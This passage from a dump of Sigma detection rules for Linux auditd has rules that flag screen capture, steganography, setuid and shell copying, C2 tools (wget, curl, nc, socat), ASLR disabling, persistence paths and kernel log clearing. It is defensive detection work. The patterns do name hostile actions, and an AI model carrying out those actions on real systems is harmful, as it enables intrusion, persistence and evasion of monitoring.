reasons.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_screencapture_import.yml",
    "content": "title: Screen Capture with Import Tool\nid: dbe4b9c5-c254-4258-9688-d6af0b7967fd\nstatus: test\ndescription: |\n  Detects an adversary creating a screen capture of a desktop with the Import tool.\n  Use of this rule on servers is highly recommended, due to the high usage of screenshot utilities on user workstations.\n  ImageMagick must be installed.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md\n    - https://linux.die.net/man/1/import\n    - https://imagemagick.org/\nauthor: 'Pawel Mazur'\ndate: 2021-09-21\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    import:\n        type: EXECVE\n        a0: import\n    import_window_root:\n        a1: '-window'\n        a2: 'root'\n        a3|endswith:\n            - '.png'\n            - '.jpg'\n            - '.jpeg'\n    import_no_window_root:\n        a1|endswith:\n            - '.png'\n            - '.jpg'\n            - '.jpeg'\n    condition: import and (import_window_root or import_no_window_root)\nfalsepositives:\n    - Legitimate use of screenshot utility\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_screencaputre_xwd.yml",
    "content": "title: Screen Capture with Xwd\nid: e2f17c5d-b02a-442b-9052-6eb89c9fec9c\nstatus: test\ndescription: Detects an adversary creating a full-screen capture with xwd. Use of this rule on servers is highly recommended, due to the high usage of screenshot utilities on user workstations.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture\n    - https://linux.die.net/man/1/xwd\nauthor: 'Pawel Mazur'\ndate: 2021-09-13\nmodified: 2022-12-18\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: xwd\n    xwd_root_window:\n        a1: '-root'\n        a2: '-out'\n        a3|endswith: '.xwd'\n    xwd_no_root_window:\n        a1: '-out'\n        a2|endswith: '.xwd'\n    condition: selection and 1 of xwd_*\nfalsepositives:\n    - Legitimate use of screenshot utility\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_steghide_embed_steganography.yml",
    "content": "title: Steganography Hide Files with Steghide\nid: ce446a9e-30b9-4483-8e38-d2c9ad0a2280\nstatus: test\ndescription: Detects embedding of files using the steghide binary. Adversaries may use this technique to prevent the detection of hidden information.\nreferences:\n    - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/\nauthor: 'Pawel Mazur'\ndate: 2021-09-11\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: steghide\n        a1: embed\n        a2:\n            - '-cf'\n            - '-ef'\n        a4:\n            - '-cf'\n            - '-ef'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_steghide_extract_steganography.yml",
    "content": "title: Steganography Extract Files with Steghide\nid: a5a827d9-1bbe-4952-9293-c59d897eb41b\nstatus: test\ndescription: Detects extraction of files using the steghide binary. Adversaries may use this technique to prevent the detection of hidden information.\nreferences:\n    - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/\nauthor: 'Pawel Mazur'\ndate: 2021-09-11\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: steghide\n        a1: extract\n        a2: '-sf'\n        a3|endswith:\n            - '.jpg'\n            - '.png'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_susp_cmds.yml",
    "content": "title: Suspicious Commands Linux\nid: 1543ae20-cbdf-4ec1-8d12-7664d667a825\nstatus: test\ndescription: Detects relevant commands often related to malware or hacking activity\nreferences:\n    - Internal Research - mostly derived from exploit code including code in MSF\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-12-12\nmodified: 2022-10-05\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    cmd1:\n        type: 'EXECVE'\n        a0: 'chmod'\n        a1: 777\n    cmd2:\n        type: 'EXECVE'\n        a0: 'chmod'\n        a1: 'u+s'\n    cmd3:\n        type: 'EXECVE'\n        a0: 'cp'\n        a1: '/bin/ksh'\n    cmd4:\n        type: 'EXECVE'\n        a0: 'cp'\n        a1: '/bin/sh'\n    condition: 1 of cmd*\nfalsepositives:\n    - Admin activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_susp_histfile_operations.yml",
    "content": "title: Suspicious History File Operations - Linux\nid: eae8ce9f-bde9-47a6-8e79-f20d18419910\nstatus: test\ndescription: 'Detects command line operations on shell history files'\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nauthor: 'Mikhail Larin, oscd.community'\ndate: 2020-10-17\nmodified: 2022-11-28\ntags:\n    - attack.credential-access\n    - attack.t1552.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    execve:\n        type: EXECVE\n    history:\n        - '.bash_history'\n        - '.zsh_history'\n        - '.zhistory'\n        - '.history'\n        - '.sh_history'\n        - 'fish_history'\n    condition: execve and history\nfalsepositives:\n    - Legitimate administrative activity\n    - Legitimate software cleaning history files\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_susp_service_reload_or_restart.yml",
    "content": "title: Service Reload or Start - Linux\nid: 2625cc59-0634-40d0-821e-cb67382a3dd7\nstatus: test\ndescription: Detects the start, reload or restart of a service.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md\nauthor: Jakob Weinzettl, oscd.community, CheraghiMilad\ndate: 2019-09-23\nmodified: 2025-03-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.002\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0|contains:\n            - 'systemctl'\n            - 'service'\n        a1|contains:\n            - 'reload'\n            - 'start'\n    condition: selection\nfalsepositives:\n    - Installation of legitimate service.\n    - Legitimate reconfiguration of service.\n    - Command line contains daemon-reload.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_system_shutdown_reboot.yml",
    "content": "title: System Shutdown/Reboot - Linux\nid: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f\nstatus: test\ndescription: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md\nauthor: 'Igor Fits, oscd.community'\ndate: 2020-10-15\nmodified: 2022-11-26\ntags:\n    - attack.impact\n    - attack.t1529\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    execve:\n        type: 'EXECVE'\n    shutdowncmd:\n        - 'shutdown'\n        - 'reboot'\n        - 'halt'\n        - 'poweroff'\n    init:\n        - 'init'\n        - 'telinit'\n    initselection:\n        - 0\n        - 6\n    condition: execve and (shutdowncmd or (init and initselection))\nfalsepositives:\n    - Legitimate administrative activity\nlevel: informational\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_unzip_hidden_zip_files_steganography.yml",
    "content": "title: Steganography Unzip Hidden Information From Picture File\nid: edd595d7-7895-4fa7-acb3-85a18a8772ca\nstatus: test\ndescription: Detects extraction of a zip file from an image file\nreferences:\n    - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/\nauthor: 'Pawel Mazur'\ndate: 2021-09-09\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    commands:\n        type: EXECVE\n        a0: unzip\n    a1:\n        a1|endswith:\n            - '.jpg'\n            - '.png'\n    condition: commands and a1\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_user_discovery.yml",
    "content": "title: System Owner or User Discovery - Linux\nid: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3\nstatus: test\ndescription: |\n    Detects the execution of host or user discovery utilities such as \"whoami\", \"hostname\", \"id\", etc.\n    Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2025-06-04\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0:\n            - 'hostname'\n            - 'id'\n            - 'last'\n            - 'uname'\n            - 'users'\n            - 'w'\n            - 'who'\n            - 'whoami'\n    condition: selection\nfalsepositives:\n    - Admin activity\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_audio_capture.yml",
    "content": "title: Audio Capture\nid: a7af2487-9c2f-42e4-9bb9-ff961f0561d5\nstatus: test\ndescription: Detects attempts to record audio using the arecord and ecasound utilities.\nreferences:\n    - https://linux.die.net/man/1/arecord\n    - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa\n    - https://manpages.debian.org/unstable/ecasound/ecasound.1.en.html\n    - https://ecasound.seul.org/ecasound/Documentation/examples.html#fconversions\nauthor: Pawel Mazur, Milad Cheraghi\ndate: 2021-09-04\nmodified: 2025-12-05\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_execve:\n        type: EXECVE\n        a0: arecord\n        a1: '-vv'\n        a2: '-fdat'\n    selection_syscall_memfd_create:\n        type: SYSCALL\n        exe|endswith: \"/ecasound\"\n        SYSCALL: 'memfd_create'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_disable_aslr_protection.yml",
    "content": "title: ASLR Disabled Via Sysctl or Direct Syscall - Linux\nid: e497a24e-9345-4a62-9803-b06d7d7cb132\nstatus: experimental\ndescription: |\n    Detects actions that disable Address Space Layout Randomization (ASLR) in Linux, including:\n      - Use of the `personality` syscall with the ADDR_NO_RANDOMIZE flag (0x0040000)\n      - Modification of the /proc/sys/kernel/randomize_va_space file\n      - Execution of the `sysctl` command to set `kernel.randomize_va_space=0`\n    Disabling ASLR is often used by attackers during exploit development or to bypass memory protection mechanisms.\n    A successful use of these methods can reduce the effectiveness of ASLR and make memory corruption attacks more reliable.\nreferences:\n    - https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/personality-syscall/README.md\n    - https://man7.org/linux/man-pages/man2/personality.2.html\n    - https://manual.cs50.io/2/personality\n    - https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/\nauthor: Milad Cheraghi\ndate: 2025-05-26\nmodified: 2025-12-05\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1055.009\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_syscall:\n        type: 'SYSCALL'\n        SYSCALL: 'personality'\n        a0: 40000\n    selection_sysctl:\n        type: 'EXECVE'\n        a0: 'sysctl'\n        a1: '-w'\n        a2: 'kernel.randomize_va_space=0' # 0 = disable\n    condition: 1 of selection_*\nfalsepositives:\n    - Debugging or legitimate software testing\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml",
    "content": "title: Linux Keylogging with Pam.d\nid: 49aae26c-450e-448b-911d-b3c13d178dfc\nstatus: test\ndescription: Detects attempts to enable auditing of TTY input\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md\n    - https://linux.die.net/man/8/pam_tty_audit\n    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing\n    - https://access.redhat.com/articles/4409591#audit-record-types-2\nauthor: 'Pawel Mazur'\ndate: 2021-05-24\nmodified: 2022-12-18\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1056.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_path_events:\n        type: PATH\n        name:\n            - '/etc/pam.d/system-auth'\n            - '/etc/pam.d/password-auth'\n    selection_tty_events:\n        type:\n            - 'TTY'\n            - 'USER_TTY'\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrative work\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_password_policy_discovery.yml",
    "content": "title: Password Policy Discovery - Linux\nid: ca94a6db-8106-4737-9ed2-3e3bb826af0a\nstatus: stable\ndescription: Detects password policy discovery commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md\n    - https://linux.die.net/man/1/chage\n    - https://man7.org/linux/man-pages/man1/passwd.1.html\n    - https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu\nauthor: Ömer Günal, oscd.community, Pawel Mazur\ndate: 2020-10-08\nmodified: 2024-12-01\ntags:\n    - attack.discovery\n    - attack.t1201\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_files:\n        type: 'PATH'\n        name:\n            - '/etc/login.defs'\n            - '/etc/pam.d/auth'\n            - '/etc/pam.d/common-account'\n            - '/etc/pam.d/common-auth'\n            - '/etc/pam.d/common-password'\n            - '/etc/pam.d/system-auth'\n            - '/etc/security/pwquality.conf'\n    selection_chage:\n        type: 'EXECVE'\n        a0: 'chage'\n        a1:\n            - '--list'\n            - '-l'\n    selection_passwd:\n        type: 'EXECVE'\n        a0: 'passwd'\n        a1:\n            - '-S'\n            - '--status'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_susp_c2_commands.yml",
    "content": "title: Suspicious C2 Activities\nid: f7158a64-6204-4d6d-868a-6e6378b467e0\nstatus: test\ndescription: |\n    Detects suspicious activities as declared by Florian Roth in his 'Best Practice Auditd Configuration'.\n    This includes the detection of the following commands: wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\n    These commands match several techniques of the \"Command and Control\" tactic, including (non-exhaustively) Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095) and Data Encoding (T1132).\nreferences:\n    - https://github.com/Neo23x0/auditd\nauthor: Marie Euler\ndate: 2020-05-18\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -w /usr/bin/wget -p x -k susp_activity\n        -w /usr/bin/curl -p x -k susp_activity\n        -w /usr/bin/base64 -p x -k susp_activity\n        -w /bin/nc -p x -k susp_activity\n        -w /bin/netcat -p x -k susp_activity\n        -w /usr/bin/ncat -p x -k susp_activity\n        -w /usr/bin/ss -p x -k susp_activity\n        -w /usr/bin/netstat -p x -k susp_activity\n        -w /usr/bin/ssh -p x -k susp_activity\n        -w /usr/bin/scp -p x -k susp_activity\n        -w /usr/bin/sftp -p x -k susp_activity\n        -w /usr/bin/ftp -p x -k susp_activity\n        -w /usr/bin/socat -p x -k susp_activity\n        -w /usr/bin/wireshark -p x -k susp_activity\n        -w /usr/bin/tshark -p x -k susp_activity\n        -w /usr/bin/rawshark -p x -k susp_activity\n        -w /usr/bin/rdesktop -p x -k susp_activity\n        -w /usr/local/bin/rdesktop -p x -k susp_activity\n        -w /usr/bin/wlfreerdp -p x -k susp_activity\n        -w /usr/bin/xfreerdp -p x -k susp_activity\n        -w /usr/local/bin/xfreerdp -p x -k susp_activity\n        -w /usr/bin/nmap -p x -k susp_activity\n        (via https://github.com/Neo23x0/auditd/blob/ddf2603dbc985f97538d102f13b4e4446b402bae/audit.rules#L336)\ndetection:\n    selection:\n        key: 'susp_activity'\n    condition: selection\nfalsepositives:\n    - Admin or User activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_system_info_discovery.yml",
    "content": "title: System Information Discovery - Auditd\nid: f34047d9-20d3-4e8b-8672-0a35cc50dc71\nstatus: test\ndescription: Detects System Information Discovery commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md\nauthor: Pawel Mazur\ndate: 2021-09-03\nmodified: 2023-03-06\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_1:\n        type: PATH\n        name:\n            - /etc/lsb-release\n            - /etc/redhat-release\n            - /etc/issue\n    selection_2:\n        type: EXECVE\n        a0:\n            - uname\n            - uptime\n            - lsmod\n            - hostname\n            - env\n    selection_3:\n        type: EXECVE\n        a0: grep\n        a1|contains:\n            - vbox\n            - vm\n            - xen\n            - virtio\n            - hv\n    selection_4:\n        type: EXECVE\n        a0: kmod\n        a1: list\n    condition: 1 of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_auditing_config_change.yml",
    "content": "title: Auditing Configuration Changes on Linux Host\nid: 977ef627-4539-4875-adf4-ed8f780c4922\nstatus: test\ndescription: Detects changes to auditd configuration files\nreferences:\n    - https://github.com/Neo23x0/auditd/blob/master/audit.rules\n    - Self Experience\nauthor: Mikhail Larin, oscd.community\ndate: 2019-10-25\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: PATH\n        name:\n            - /etc/audit/*\n            - /etc/libaudit.conf\n            - /etc/audisp/*\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_bpfdoor_file_accessed.yml",
    "content": "title: BPFDoor Abnormal Process ID or Lock File Accessed\nid: 808146b2-9332-4d78-9416-d7e47012d83d\nstatus: test\ndescription: Detects access to BPFDoor .lock and .pid files in the temporary file storage facility\nreferences:\n    - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n    - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\nauthor: Rafal Piasecki\ndate: 2022-08-10\ntags:\n    - attack.execution\n    - attack.t1106\n    - attack.t1059\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - /var/run/haldrund.pid\n            - /var/run/xinetd.lock\n            - /var/run/kdevrund.pid\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_hidden_binary_execution.yml",
    "content": "title: Use Of Hidden Paths Or Files\nid: 9e1bef8d-0fff-46f6-8465-9aa54e128c1e\nrelated:\n    - id: d08722cd-3d09-449a-80b4-83ea2d9d4616\n      type: similar\nstatus: test\ndescription: Detects calls to hidden files or files located in hidden directories in NIX systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md\nauthor: David Burkett, @signalblur\ndate: 2022-12-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name|contains: '/.'\n    filter:\n        name|contains:\n            - '/.cache/'\n            - '/.config/'\n            - '/.pyenv/'\n            - '/.rustup/toolchains'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_ld_so_preload_mod.yml",
    "content": "title: Modification of ld.so.preload\nid: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751\nstatus: test\ndescription: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name: '/etc/ld.so.preload'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_logging_config_change.yml",
    "content": "title: Logging Configuration Changes on Linux Host\nid: c830f15d-6f6e-430f-8074-6f73d6807841\nstatus: test\ndescription: Detects changes to syslog daemon configuration files\nreferences:\n    - self experience\nauthor: Mikhail Larin, oscd.community\ndate: 2019-10-25\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - /etc/syslog.conf\n            - /etc/rsyslog.conf\n            - /etc/syslog-ng/syslog-ng.conf\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_magic_system_request_key.yml",
    "content": "title: Potential Abuse of Linux Magic System Request Key\nid: ea61bb82-a5e0-42e6-8537-91d29500f1b9\nstatus: experimental\ndescription: |\n    Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges\n    to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes,\n    or disrupt forensic analysis—all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be\n    misused as a stealthy post-exploitation tool. It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf.\nreferences:\n    - https://www.kernel.org/doc/html/v4.10/_sources/admin-guide/sysrq.txt\n    - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/4/html/reference_guide/s3-proc-sys-kernel\n    - https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html\nauthor: Milad Cheraghi\ndate: 2025-05-23\ntags:\n    - attack.execution\n    - attack.t1059.004\n    - attack.impact\n    - attack.t1529\n    - attack.t1489\n    - attack.t1499\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -w /proc/sysrq-trigger -p wa -k sysrq\n        -w /proc/sys/kernel/sysrq -p wa -k sysrq\ndetection:\n    selection:\n        type: 'PATH'\n        name|endswith:\n            # Enable\n            - '/sysrq'\n            - '/sysctl.conf'\n            # Execute\n            - '/sysrq-trigger'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_system_info_discovery2.yml",
    "content": "title: System and Hardware Information Discovery\nid: 1f358e2e-cb63-43c3-b575-dfb072a6814f\nrelated:\n    - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239\n      type: derived\nstatus: stable\ndescription: Detects system information discovery commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-08\nmodified: 2022-11-26\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - '/sys/class/dmi/id/bios_version'\n            - '/sys/class/dmi/id/product_name'\n            - '/sys/class/dmi/id/chassis_vendor'\n            - '/proc/scsi/scsi'\n            - '/proc/ide/hd0/model'\n            - '/proc/version'\n            - '/etc/*version'\n            - '/etc/*release'\n            - '/etc/issue'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_systemd_service_creation.yml",
    "content": "title: Systemd Service Creation\nid: 1bac86ba-41aa-4f62-9d6b-405eac99b485\nstatus: test\ndescription: Detects the creation of systemd services, which could be used by adversaries to execute malicious code.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md\nauthor: 'Pawel Mazur'\ndate: 2022-02-03\nmodified: 2022-02-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.002\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    path:\n        type: 'PATH'\n        nametype: 'CREATE'\n    name_1:\n        name|startswith:\n            - '/usr/lib/systemd/system/'\n            - '/etc/systemd/system/'\n    name_2:\n        name|contains: '/.config/systemd/user/'\n    condition: path and 1 of name_*\nfalsepositives:\n    - Admin work like legit service installs.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_unix_shell_configuration_modification.yml",
    "content": "title: Unix Shell Configuration Modification\nid: a94cdd87-6c54-4678-a6cc-2814ffe5a13d\nrelated:\n    - id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9\n      type: obsolete\nstatus: test\ndescription: Detects Unix shell configuration modification. Adversaries may establish persistence by executing malicious commands that are triggered when a new shell is opened.\nreferences:\n    - https://objective-see.org/blog/blog_0x68.html\n    - https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack\n    - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat\nauthor: Peter Matkovski, IAI\ndate: 2023-03-06\nmodified: 2023-03-15\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.004\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - '/etc/shells'\n            - '/etc/profile'\n            - '/etc/profile.d/*'\n            - '/etc/bash.bashrc'\n            - '/etc/bashrc'\n            - '/etc/zsh/zprofile'\n            - '/etc/zsh/zshrc'\n            - '/etc/zsh/zlogin'\n            - '/etc/zsh/zlogout'\n            - '/etc/csh.cshrc'\n            - '/etc/csh.login'\n            - '/root/.bashrc'\n            - '/root/.bash_profile'\n            - '/root/.profile'\n            - '/root/.zshrc'\n            - '/root/.zprofile'\n            - '/home/*/.bashrc'\n            - '/home/*/.zshrc'\n            - '/home/*/.bash_profile'\n            - '/home/*/.zprofile'\n            - '/home/*/.profile'\n            - '/home/*/.bash_login'\n            - '/home/*/.bash_logout'\n            - '/home/*/.zlogin'\n            - '/home/*/.zlogout'\n    condition: selection\nfalsepositives:\n    - Admin or user activity is expected to generate some false positives\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/service_stop/lnx_auditd_disable_system_firewall.yml",
    "content": "title: Disable System Firewall\nid: 53059bc0-1472-438b-956a-7508a94a91f0\nstatus: test\ndescription: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md\n    - https://firewalld.org/documentation/man-pages/firewall-cmd.html\nauthor: 'Pawel Mazur'\ndate: 2022-01-22\ntags:\n    - attack.t1562.004\n    - attack.defense-evasion\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SERVICE_STOP'\n        unit:\n            - 'firewalld'\n            - 'iptables'\n            - 'ufw'\n    condition: selection\nfalsepositives:\n    - Admin activity\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml",
    "content": "title: Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall\nid: eca5e022-d368-4043-98e5-9736fb01f72f\nstatus: experimental\ndescription: |\n    Detects the use of the `syslog` syscall with action code 5 (SYSLOG_ACTION_CLEAR),\n    (4 is SYSLOG_ACTION_READ_CLEAR and 6 is SYSLOG_ACTION_CONSOLE_OFF) which clears the kernel\n    ring buffer (dmesg logs). This can be used by attackers to hide traces after exploitation\n    or privilege escalation. A common technique is running `dmesg -c`, which triggers this syscall internally.\nreferences:\n    - https://man7.org/linux/man-pages/man2/syslog.2.html\n    - https://man7.org/linux/man-pages/man1/dmesg.1.html\nauthor: Milad Cheraghi\ndate: 2025-05-27\nmodified: 2025-12-05\ntags:\n    - attack.defense-evasion\n    - attack.t1070.002\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -a always,exit -F arch=b64 -S syslog -F a0=4 -k clear_dmesg_logs\n        -a always,exit -F arch=b64 -S syslog -F a0=5 -k clear_dmesg_logs\n        -a always,exit -F arch=b64 -S syslog -F a0=6 -k disable_dmesg_logs\n        -a always,exit 